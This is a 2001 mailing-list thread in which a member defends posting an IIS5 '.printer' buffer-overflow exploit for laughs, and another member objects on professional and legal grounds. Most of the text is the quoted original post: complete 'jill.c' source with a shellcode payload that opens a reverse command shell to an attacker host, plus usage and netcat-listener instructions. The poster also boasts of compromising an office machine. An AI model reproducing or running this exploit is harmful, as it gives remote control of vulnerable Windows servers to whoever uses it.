just incase you missed it
Nigel Sollars
plug-discuss@lists.PLUG.phoenix.az.us
Tue, 8 May 2001 10:57:16 +0000
On Tue, 08 May 2001, you wrote:
> In the interest of maintaining a professional list, and a professional
> image, I would appreciate this type of posting not continue. It has no
> place here. There are plenty of sites out there where we can get this
> stuff if we were so inclined. Highlighting Microsoft's inability to
> patch the same overflow from one IIS version to the next does not
> favorably promote Linux at all - in fact, it continues the negative
> "Hacker OS" image that so many are working to overcome.
>
> Perhaps I'm showing my age, but I don't see how making some underpaid[1]
> NT admin's life miserable by "0wning hiz b0x with a r00t wind0w" does
> him any good. Sure, he looks like a moron to his boss, and they'll
> patch the OS (if they're lucky[2]), or pay some overpaid MCSE shyster to
> do it for them.
>
> It also does not reflect well on you, as all you are doing is passing
> on someone else's work, just like a script-kiddie. This post would be
> educational if you were to disassemble the embedded hex in unsigned
> char sploit and discuss in detail how and why it works. (Not simply
> "it overruns the print buffer and sends me a console" - I got that much
> from the SANS and Security Portal e-mails.)
>
> Anyone considering using this code might want to consider the
> ramifications of the Computer Fraud and Abuse Act[3]. Personally, I
> have more ambition than becoming Bubba's newest conquest.
>
> Yes, I was offended.
>
> George
Well well well
just for the record im no SkRiPT KidDiEE for 1
I was however at the Windows01 show in London last week promoting Linux to the
masses there where the attitude was one of we need to get rid of Micro$haft
the post was purely one for fun and a cheap laugh ok so u may have been
offended and the point is?
To be perfectly honest i found this one highly amuzing after the slagging the
opensource community got from the MicroSoft bods about security
I guess if we refuse to acknowledge these sploits as ammo for the open source
community then we should pack our bags and head for richmond.
Nige
>
>
> References:
> 1. SANS Salary Survey,
> http://www.sans.org/newlook/publications/salary2000.htm, note 10.
> 2. Security Portal,
> http://securityportal.com/articles/ntspseven20010507.html
> 3. Computer Fraud and Abuse Act, 18 U.S.C. § 1030
>
>
> Nigel Sollars wrote:
>
> > Hi,
> >
> > Just incase you missed this one here is the jill code .. the IIS5 printer
> > overflow exploit ...
> >
> > Ive done a box here at the office .. hehe brings the term got root? to a
> > reality.
> >
> > Nige..
> >
> > code as follows :-
> >
> > IIS 5 remote .printer overflow. "jill.c" (don't ask).
> > *
> > * by: dark spyrit <dspyrit@beavuh.org>
> > *
> > * respect to eeye for finding this one - nice work.
> > * shouts to halvar, neofight and the beavuh bitchez.
> > *
> > * this exploit overwrites an exception frame to control eip and get to
> > * our code.. the code then locates the pointer to our larger buffer and
> > * execs.
> > *
> > * usage: jill <victim host> <victim port> <attacker host> <attacker port>
> > *
> > * the shellcode spawns a reverse cmd shell.. so you need to set up a
> > * netcat listener on the host you control.
> > *
> > * Ex: nc -l -p <attacker port> -vv
> > *
> > * I haven't slept in years.
> > */
> >
> > #include <sys/types.h>
> > #include <sys/time.h>
> > #include <sys/socket.h>
> > #include <netinet/in.h>
> > #include <arpa/inet.h>
> > #include <unistd.h>
> > #include <errno.h>
> > #include <stdlib.h>
> > #include <stdio.h>
> > #include <string.h>
> > #include <fcntl.h>
> > #include <netdb.h>
> >
> > int main(int argc, char *argv[]){
> >
> > /* the whole request rolled into one, pretty huh? carez. */
> >
> > unsigned char sploit[]=
> > "\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
> > "\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
> > "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
> > "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
> > "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
> > "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
> > "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
> > "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
> > "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
> > "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
> > "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
> > "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
> > "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
> > "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
> > "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
> > "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
> > "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
> > "\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
> > "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
> > "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
> > "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
> > "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
> > "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
> > "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
> > "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
> > "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
> > "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
> > "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
> > "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
> > "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
> > "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
> > "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
> > "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
> > "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
> > "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
> > "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
> > "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
> > "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
> > "\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
> > "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
> > "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
> > "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
> > "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
> > "\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> > "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
> > "\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
> > "\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";
> >
> > int s;
> > unsigned short int a_port;
> > unsigned long a_host;
> > struct hostent *ht;
> > struct sockaddr_in sin;
> >
> > printf("iis5 remote .printer overflow.\n"
> > "dark spyrit <dspyrit@beavuh.org> / beavuh labs.\n");
> >
> > if (argc != 5){
> > printf("usage: %s <victimHost> <victimPort> <attackerHost> <attackerPort>\n",argv[0]);
> > exit(1);
> > }
> >
> > if ((ht = gethostbyname(argv[1])) == 0){
> > herror(argv[1]);
> > exit(1);
> > }
> >
> > sin.sin_port = htons(atoi(argv[2]));
> > a_port = htons(atoi(argv[4]));
> > a_port^=0x9595;
> >
> > sin.sin_family = AF_INET;
> > sin.sin_addr = *((struct in_addr *)ht->h_addr);
> >
> > if ((ht = gethostbyname(argv[3])) == 0){
> > herror(argv[3]);
> > exit(1);
> > }
> >
> > a_host = *((unsigned long *)ht->h_addr);
> > a_host^=0x95959595;
> >
> > sploit[441]= (a_port) & 0xff;
> > sploit[442]= (a_port >> 8) & 0xff;
> >
> > sploit[446]= (a_host) & 0xff;
> > sploit[447]= (a_host >> 8) & 0xff;
> > sploit[448]= (a_host >> 16) & 0xff;
> > sploit[449]= (a_host >> 24) & 0xff;
> >
> > if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
> > perror("socket");
> > exit(1);
> > }
> >
> > printf("\nconnecting... \n");
> >
> > if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
> > perror("connect");
> > exit(1);
> > }
> >
> > write(s, sploit, strlen(sploit));
> > sleep (1);
> > close (s);
> >
> > printf("sent... \nyou may need to send a carriage on your listener if the shell doesn't appear.\nhave fun!\n");
> > exit(0);
> > }
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> >
> > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
>
>
> --
> "Fate, it seems, is not without a sense of irony" - Morpheus
>
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
>
> PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss